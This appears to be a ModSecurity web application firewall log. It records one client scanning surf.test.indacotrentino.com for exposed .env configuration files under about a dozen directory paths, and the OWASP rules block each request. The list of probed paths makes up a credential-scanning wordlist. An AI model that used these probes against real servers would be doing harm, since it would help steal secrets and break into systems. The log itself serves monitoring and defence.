[Sun Sep 14 15:35:47.975727 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMbEs2XJXtYjt2K02q_z_gAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:47.975985 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMbEs2XJXtYjt2K02q_z_gAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:47.976138 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMbEs2XJXtYjt2K02q_z_gAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.251106 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0AgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.251349 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0AgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.251523 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0AgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.308576 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0AwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.308809 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0AwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.308976 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0AwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.363346 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.363581 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.363756 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.420848 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.421115 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.421293 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.476297 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.476542 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.476718 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.533448 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.533692 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.533847 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0BwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.588222 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.588449 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.588609 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.643842 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.644078 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.644244 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.718896 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.719151 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.719320 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.776019 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.776251 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.776424 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0CwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.831658 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.831884 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.832031 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.886619 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.886858 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.887015 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DQAAAA4"], referer: https://www.google.com/
